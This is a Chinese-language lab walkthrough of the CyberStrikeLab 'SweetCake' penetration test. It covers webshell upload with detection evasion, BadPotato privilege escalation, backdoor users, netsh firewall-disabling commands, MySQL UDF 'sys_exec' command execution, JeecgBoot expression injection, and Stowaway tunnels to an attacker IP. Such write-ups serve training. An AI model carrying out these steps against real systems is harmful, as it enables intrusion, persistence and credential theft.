CyberStrikeLab SweetCake 渗透测试实战教学文档<\/h1>

1. 第一台机器渗透测试<\/h2>

1.1 信息收集<\/h3>

使用fscan扫描发现仅开放8888端口，运行Tomcat服务<\/li>

目录扫描：使用43万条目的红队专用字典扫描，发现关键目录<\/li> <\/ul>

1.2 漏洞利用<\/h3>

上传Webshell到根目录<\/li>
使用哥斯拉特战版进行混淆绕过检测<\/li>

发现Windows Defender存在但未启用<\/li> <\/ul>

1.3 权限提升<\/h3>

方法一：BadPotato提权<\/strong><\/p>

使用BadPotato.exe直接提权<\/li>
创建后门用户并开启3389远程桌面<\/li>
通过bat脚本执行命令避免引号问题<\/li>
关闭防火墙命令：
netsh advfirewall set allprofiles state off <\/span><\/span><\/code><\/pre>特定网络配置关闭： netsh advfirewall set domainprofile state off <\/span><\/span>netsh advfirewall set privateprofile state off <\/span><\/span>netsh advfirewall set publicprofile state off <\/span><\/span><\/code><\/pre><\/li> <\/ol> 方法二：正向连接<\/strong><\/p> 使用Vshell进行正向连接<\/li> 生成CS客户端： 4444端口用于CS上线<\/li> 5555端口用于提权<\/li> <\/ul> <\/li> 使用BadPotato执行5555客户端<\/li> <\/ol> 1.4 内网横向移动<\/h3> 使用Stowaway搭建第一层代理<\/li> 上传fscan进行内网扫描<\/li> 获取凭证：Struts@cslab<\/li> <\/ul> 2. 第二台机器（通达OA）<\/h2> 2.1 漏洞利用<\/h3> 通达OA数据库提权漏洞利用<\/li> 获取数据库凭据：root\/HvaaOUr6n^v`_dyw@0YjA<\/li> <\/ul> 2.2 提权过程<\/h3> 在MySQL目录下创建lib和plugin目录<\/li> 上传lib_mysqludf_sys.dll（可使用sqlmap自带但需解密）<\/li> 使用BadPotato提权（靶机响应慢，建议写入bat脚本执行）<\/li> 通过RDP连接读取flag<\/li> <\/ol> 3. 第三台机器（积木报表）<\/h2> 3.1 漏洞发现<\/h3> 识别为JeecgBoot系统<\/li> AviatorScript表达式注入漏洞<\/li> <\/ul> 3.2 漏洞利用<\/h3> 新建报表时使用BP抓包<\/li> 修改save接口POC进行注入<\/li> 使用show接口触发代码执行<\/li> 连接冰蝎4： URL: http:\/\/localhost:8085\/jmreport\/showme<\/li> 密码: password<\/li> 请求头: Referer: Fvjxgwzbm<\/li> <\/ul> <\/li> <\/ol> 3.3 权限维持<\/h3> 使用5555正向客户端上线CS<\/li> 获取hash: aviator!321<\/li> 开启3389并关闭防火墙<\/li> <\/ul> 4. 第四台机器<\/h2> 4.1 信息收集<\/h3> 发现桌面有Xshell<\/li> 抓取明文凭据<\/li> <\/ul> 4.2 横向移动<\/h3> 使用XTerminal连接（Xshell文件传输问题）<\/li> 使用Stowaway搭建第二层代理<\/li> <\/ul> 5. 第五台机器<\/h2> 5.1 内网渗透<\/h3> 发现MS17-010漏洞<\/li> 使用MSF进行利用<\/li> 备用方案：通过1433端口攻击<\/li> <\/ul> 附录：常用命令参考<\/h2> 防火墙管理<\/h3> :: 关闭所有防火墙<\/span> <\/span><\/span>netsh advfirewall set allprofiles state off <\/span><\/span> <\/span><\/span>:: 重新启用防火墙<\/span> <\/span><\/span>netsh advfirewall set allprofiles state on <\/span><\/span><\/code><\/pre>BadPotato使用<\/h3> BadPotato.exe -c "command_to_execute"<\/span> <\/span><\/span><\/code><\/pre>数据库UDF提权<\/h3> 创建函数：<\/li> <\/ol> CREATE<\/span> FUNCTION<\/span> sys_exec RETURNS<\/span> string SONAME 'lib_mysqludf_sys.dll'<\/span>; <\/span><\/span><\/code><\/pre> 执行命令：<\/li> <\/ol> SELECT<\/span> sys_exec('command'<\/span>); <\/span><\/span><\/code><\/pre>内网代理搭建<\/h3> # Stowaway使用示例<\/span> <\/span><\/span>.\/admin -l 9999<\/span> <\/span><\/span>.\/agent -c [<\/span>攻击机IP]<\/span> -p 9999<\/span> <\/span><\/span><\/code><\/pre>本教学文档涵盖了从信息收集到内网横向移动的全过程，重点突出了各种提权技术和漏洞利用方法，以及在内网环境中的代理搭建技术。实际渗透测试中请确保获得合法授权，并注意操作带来的安全风险。<\/p>